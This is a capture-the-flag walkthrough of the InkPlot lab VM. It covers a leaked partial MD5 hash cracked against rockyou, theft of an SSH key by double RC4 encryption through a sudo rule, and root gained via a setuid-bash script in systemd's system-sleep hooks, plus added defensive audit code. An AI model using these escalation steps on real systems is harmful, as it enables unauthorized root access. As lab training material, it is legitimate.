Difficulty: medium
Kali: 192.168.56.104
Target: 192.168.56.155
Port scan
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.155 -sV -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-18 19:19 CST
Nmap scan report for 192.168.56.155
Host is up (0.00064s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_ 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
3000/tcp open websocket Ogar agar.io server
MAC Address: 08:00:27:4F:23:0D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.56.155
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.53 seconds
Two ports are open, 22 and 3000. Port 3000 runs a WebSocket service, so let's connect to it.
WebSocket
Connect with websocat.
Install websocat:
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env
cargo install websocat
┌──(root㉿kali2)-[~/Desktop]
└─# websocat ws://192.168.56.155:3000/
Welcome to our InkPlot secret IRC server
Bob: Alice, ready to knock our naive Leila off her digital pedestal?
Alice: Bob, I've been dreaming about this for weeks. Leila has no idea what's about to hit her.
Bob: Exactly. We're gonna tear her defense system apart. She won't see it coming.
Alice: Poor Leila, always so confident. Let's do this.
Bob: Alice, I'll need that MD5 hash to finish the job. Got it?
Alice: Yeah, I've got it. Time to shake Leila's world.
Bob: Perfect. Release it.
Alice: Here it goes: d51540...
*Alice has disconnected*
Bob: What?! Damn it, Alice?! Not now!
The chat leaks only the first six hex characters of the MD5 hash: d51540.
Let's write a script that searches rockyou.txt for a password whose MD5 starts with that prefix.
#!/bin/bash
# Path to the rockyou.txt wordlist
rockyou_file="/usr/share/wordlists/rockyou.txt"
# Check that rockyou.txt exists
if [ ! -f "$rockyou_file" ]; then
    echo "Error: $rockyou_file not found."
    exit 1
fi
echo "Searching for password..."
# Read the wordlist and process one password per line
while IFS= read -r password; do
    # Pipe the password (no trailing newline) into md5sum and keep only the hash field
    md5_hash=$(echo -n "$password" | md5sum | awk '{print $1}')
    # Show the candidate currently being processed and its hash
    echo "Processing password: $password (MD5: $md5_hash)"
    # Check whether the first 6 hex digits of the hash are d51540
    if [[ ${md5_hash:0:6} == "d51540" ]]; then
        echo "Password found: $password"
        # Stop at the first match; drop this break to list every candidate with the prefix
        break
    fi
done < "$rockyou_file"
echo "Done"
The search turns up two passwords: palmira and intelinside.
SSH connection
Connect as user leila; testing shows the password is intelinside.
┌──(root㉿kali2)-[~/Desktop]
└─# ssh leila@192.168.56.155
Auto-standby now activated after 2 min of inactivity
leila@192.168.56.155's password:
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
╭─leila@inkplot ~
╰─$ id
uid=1003(leila) gid=1003(leila) groups=1003(leila),100(users)
User leila has no user flag, so look at /home first.
╭─leila@inkplot ~
╰─$ ls -al /home
total 16
drwxr-xr-x 4 root root 4096 Jul 28 2023 .
drwxr-xr-x 18 root root 4096 Jul 27 2023 ..
drwx---r-x 5 leila leila 4096 Apr 18 14:47 leila
drwx---r-x 5 pauline pauline 4096 Aug 3 2023 pauline
There is another user under /home: pauline.
sudo -l
╭─leila@inkplot ~
╰─$ sudo -l
sudo: unable to resolve host inkplot: Temporary failure in name resolution
Matching Defaults entries for leila on inkplot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User leila may run the following commands on inkplot:
(pauline : pauline) NOPASSWD: /usr/bin/python3 /home/pauline/cipher.py*
There is a Python script that can be run as user pauline via sudo.
╭─leila@inkplot ~
╰─$ cat /home/pauline/cipher.py*
import os
import json
import argparse
from Crypto.Cipher import ARC4
import base64

# The RC4 key is loaded from pauline's keys.json at startup
with open('/home/pauline/keys.json', 'r') as f:
    keys = json.load(f)
crypt_key = keys['crypt_key'].encode()

def encrypt_file(filepath, key):
    # RC4-encrypt the file, base64-encode the result and write <basename>.enc
    # into the current working directory
    with open(filepath, 'rb') as f:
        file_content = f.read()
    cipher = ARC4.new(key)
    encrypted_content = cipher.encrypt(file_content)
    encoded_content = base64.b64encode(encrypted_content)
    base_filename = os.path.basename(filepath)
    with open(base_filename + '.enc', 'wb') as f:
        f.write(encoded_content)
    return base_filename + '.enc'

def decrypt_file(filepath, key):
    # base64-decode the file, then RC4-decrypt it with the key the caller supplies
    with open(filepath, 'rb') as f:
        encrypted_content = f.read()
    decoded_content = base64.b64decode(encrypted_content)
    cipher = ARC4.new(key)
    decrypted_content = cipher.decrypt(decoded_content)
    return decrypted_content

parser = argparse.ArgumentParser(description='Encrypt or decrypt a file.')
parser.add_argument('filepath', help='The path to the file to encrypt or decrypt.')
parser.add_argument('-e', '--encrypt', action='store_true', help='Encrypt the file.')
parser.add_argument('-d', '--decrypt', action='store_true', help='Decrypt the file.')
args = parser.parse_args()

if args.encrypt:
    # Encryption always uses the key from keys.json
    encrypted_filepath = encrypt_file(args.filepath, crypt_key)
    print("The encrypted and encoded content has been written to: ")
    print(encrypted_filepath)
elif args.decrypt:
    # Decryption asks the user for a key instead of using keys.json
    decrypt_key = input("Please enter the decryption key: ").encode()
    decrypted_content = decrypt_file(args.filepath, decrypt_key)
    print("The decrypted content is: ")
    print(decrypted_content)
else:
    print("Please provide an operation type. Use -e to encrypt or -d to decrypt.")
It is a script that encrypts or decrypts a file. The key is read from /home/pauline/keys.json, which leila cannot read.
Encryption is RC4 followed by base64 encoding, and the result is written to a .enc file.
RC4 is a stream cipher: the plaintext is XORed with a keystream derived from the key, so encrypting a file twice with the same key restores the original.
This can be used to recover pauline's SSH private key in plaintext by running the encrypt operation on it twice; remember to base64-decode the output in between, because the second pass must see the raw ciphertext rather than the base64 text.
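The keystream property described above, as an added example that is not part of the original writeup: a pure-Python RC4 stands in for pycryptodome's ARC4 so the block runs without that dependency, and cipher_py_encrypt mirrors the encrypt path of cipher.py. It shows that running the encrypt operation twice, with a base64 decode in between, returns the plaintext, and that feeding the base64 text straight back in does not; this is why a sudo rule that only allows encryption is still a decryption oracle for a stream cipher. The key and secret are constructed sample values.

```python
import base64

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling + PRGA, XORing the keystream into data.
    Because it is a pure XOR, the same call both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def cipher_py_encrypt(content: bytes, key: bytes) -> bytes:
    """Mirror of cipher.py -e: RC4, then base64 (the bytes that land in the .enc file)."""
    return base64.b64encode(rc4(key, content))

def recover_by_double_encrypt(plaintext: bytes, key: bytes) -> bytes:
    """The writeup's trick: encrypt, base64-decode, encrypt the raw bytes again.
    rc4(key, rc4(key, P)) == P because both passes XOR the same keystream."""
    raw_ct = base64.b64decode(cipher_py_encrypt(plaintext, key))
    return base64.b64decode(cipher_py_encrypt(raw_ct, key))

def naive_double_encrypt(plaintext: bytes, key: bytes) -> bytes:
    """Skipping the base64 decode: the second pass XORs the keystream into
    base64 text instead of the ciphertext, so nothing cancels."""
    b64_ct = cipher_py_encrypt(plaintext, key)
    return base64.b64decode(cipher_py_encrypt(b64_ct, key))

# Constructed sample values (not the box's real key file or private key)
SAMPLE_KEY = b"constructed-demo-key"
SAMPLE_SECRET = b"-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed sample body\n"

if __name__ == "__main__":
    print(recover_by_double_encrypt(SAMPLE_SECRET, SAMPLE_KEY) == SAMPLE_SECRET)   # True
    print(naive_double_encrypt(SAMPLE_SECRET, SAMPLE_KEY) == SAMPLE_SECRET)        # False
```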
╭─leila@inkplot /home/pauline
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e /home/pauline/.ssh/id_rsa
sudo: unable to resolve host inkplot: Temporary failure in name resolution
The encrypted and encoded content has been written to:
id_rsa.enc
╭─leila@inkplot /home/pauline
╰─$ cat id_rsa.enc | base64 -d >/tmp/abc.enc
╭─leila@inkplot /home/pauline
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e /tmp/abc.enc
sudo: unable to resolve host inkplot: Temporary failure in name resolution
The encrypted and encoded content has been written to:
abc.enc.enc
╭─leila@inkplot /home/pauline
╰─$ cat abc.enc.enc| base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
Then connect over SSH with the private key; remember to set its permissions to 600.
┌──(root㉿kali2)-[~/Desktop]
└─# vim 123.txt
┌──(root㉿kali2)-[~/Desktop]
└─# ssh pauline@192.168.56.155 -i 123.txt
Auto-standby now activated after 2 min of inactivity
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for '123.txt' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "123.txt": bad permissions
pauline@192.168.56.155's password:
┌──(root㉿kali2)-[~/Desktop]
└─# chmod 600 123.txt
┌──(root㉿kali2)-[~/Desktop]
└─# ssh pauline@192.168.56.155 -i 123.txt
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
╭─pauline@inkplot ~
╰─$ id
uid=1000(pauline) gid=1000(pauline) groups=1000(pauline),100(users),1002(admin)
Get the user flag
╭─pauline@inkplot ~
╰─$ ls -al
total 72
drwx---r-x 5 pauline pauline 4096 Apr 18 15:10 .
drwxr-xr-x 4 root root 4096 Jul 28 2023 ..
-rw-r--r-- 1 pauline pauline 3472 Apr 18 15:06 abc.enc.enc
-rw-r--r-- 1 pauline pauline 220 Jul 22 2023 .bash_logout
-rw-r--r-- 1 pauline pauline 3526 Jul 22 2023 .bashrc
-rw-r--r-- 1 pauline pauline 1738 Aug 1 2023 cipher.py
-rw-r--r-- 1 pauline pauline 3472 Apr 18 15:05 id_rsa.enc
-rw-r--r-- 1 pauline pauline 4632 Apr 18 15:03 id_rsa.enc.enc
-rw-r----- 1 pauline pauline 44 Jul 25 2023 keys.json
-rw------- 1 pauline pauline 20 Aug 1 2023 .lesshst
drwxr-xr-x 3 pauline pauline 4096 Jul 22 2023 .local
drwxr-xr-x 12 pauline pauline 4096 Jul 22 2023 .oh-my-zsh
-rw-r--r-- 1 pauline pauline 807 Jul 22 2023 .profile
drwx------ 2 pauline pauline 4096 Jul 28 2023 .ssh
-rw-r--r-- 1 pauline pauline 0 Jul 25 2023 .sudo_as_admin_successful
-rwx------ 1 pauline pauline 33 Jul 24 2023 user.txt
-rw------- 1 pauline pauline 203 Apr 18 15:10 .zsh_history
-rw-r--r-- 1 pauline pauline 3890 Jul 22 2023 .zshrc
╭─pauline@inkplot ~
╰─$ cat user.txt| md5sum
85695f22e85b28811add8645febdf8e4 -
Privilege escalation to root
id shows that pauline belongs to the admin group (1002(admin)).
Look for files associated with that group.
╭─pauline@inkplot ~
╰─$ find / -group admin 2>/dev/null
/usr/lib/systemd/system-sleep
Scripts in /usr/lib/systemd/system-sleep are executed by systemd, as root, when the system suspends or resumes; the SSH banner says this box auto-suspends after 2 minutes of inactivity. The directory is group-writable by admin, so pauline can place a script there.
Write a script:
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ ls -al
total 20
drwxrwx--- 2 root admin 4096 Apr 18 15:17 .
drwxr-xr-x 14 root root 12288 Jul 28 2023 ..
-rwxr-xr-x 1 pauline pauline 52 Apr 18 15:17 script
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ cat script
#!/bin/bash
chmod +s /bin/bash
chmod +s /bin/find
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ chmod +x script
Then wait. Once the broadcast says the system is about to suspend, reconnect the shell and get root.
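As an added defender-side check that is not part of the original writeup: the escalation works only because a directory whose contents systemd runs as root is group-writable and holds a non-root-owned script. The following Python function audits a hook directory for exactly that, and reports setuid bits on the binaries the writeup's script modifies. The sample directory it builds is constructed to mirror the ls output above; the function names are assumptions of this example.

```python
import os
import stat
import tempfile

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH

def audit_hook_dir(hook_dir: str) -> list:
    """Findings for one systemd hook directory (e.g. /usr/lib/systemd/system-sleep).
    systemd runs every executable in it as root around suspend/resume, so the
    directory and its entries must be root-owned and not group/other-writable."""
    findings = []
    st = os.stat(hook_dir)
    if st.st_uid != 0:
        findings.append(f"{hook_dir}: owned by uid {st.st_uid}, not root")
    if st.st_mode & WRITE_BITS:
        findings.append(f"{hook_dir}: writable by group/other ({stat.filemode(st.st_mode)})")
    for name in sorted(os.listdir(hook_dir)):
        path = os.path.join(hook_dir, name)
        fst = os.lstat(path)
        if fst.st_uid != 0:
            findings.append(f"{path}: owned by uid {fst.st_uid}, not root")
        if fst.st_mode & WRITE_BITS:
            findings.append(f"{path}: writable by group/other ({stat.filemode(fst.st_mode)})")
        if stat.S_ISLNK(fst.st_mode):
            findings.append(f"{path}: symlink, verify its target is root-controlled")
    return findings

def setuid_binaries(paths=("/bin/bash", "/bin/sh", "/usr/bin/find")) -> list:
    """Which of the given binaries carry the setuid bit. The writeup's hook script
    sets it on /bin/bash and /bin/find; a setuid shell is never legitimate."""
    return [p for p in paths if os.path.exists(p) and os.stat(p).st_mode & stat.S_ISUID]

def make_sample_hook_dir() -> str:
    """Constructed sample mirroring the listing in the writeup: a hook directory with
    mode drwxrwx--- (group-writable) containing a script with mode -rwxr-xr-x."""
    d = tempfile.mkdtemp(prefix="system-sleep-sample-")
    os.chmod(d, 0o770)
    with open(os.path.join(d, "script"), "w") as f:
        f.write("#!/bin/bash\n")
    os.chmod(os.path.join(d, "script"), 0o755)
    return d

if __name__ == "__main__":
    target = "/usr/lib/systemd/system-sleep"
    sample = make_sample_hook_dir()
    for d in ([target] if os.path.isdir(target) else []) + [sample]:
        print(d, audit_hook_dir(d) or ["ok"])
    print("setuid:", setuid_binaries())
```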
pauline@inkplot:~$
Broadcast message from root@inkplot (Thu 2024-04-18 15:30:48 CEST):
The system will suspend now!
client_loop: send disconnect: Broken pipe
┌──(root㉿kali2)-[~/Desktop]
└─# ssh pauline@192.168.56.155 -i 123.txt
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 18 15:26:44 2024 from 192.168.56.104
╭─pauline@inkplot ~
╰─$ bash -p
bash-5.2# id
uid=1000(pauline) gid=1000(pauline) euid=0(root) egid=0(root) groups=0(root),100(users),1000(pauline),1002(admin)
bash-5.2# cat /root/* | md5sum
d02568a00695b655bbeb56bf6f44dd45 -
I didn't really understand this last part; I reproduced it by following a writeup.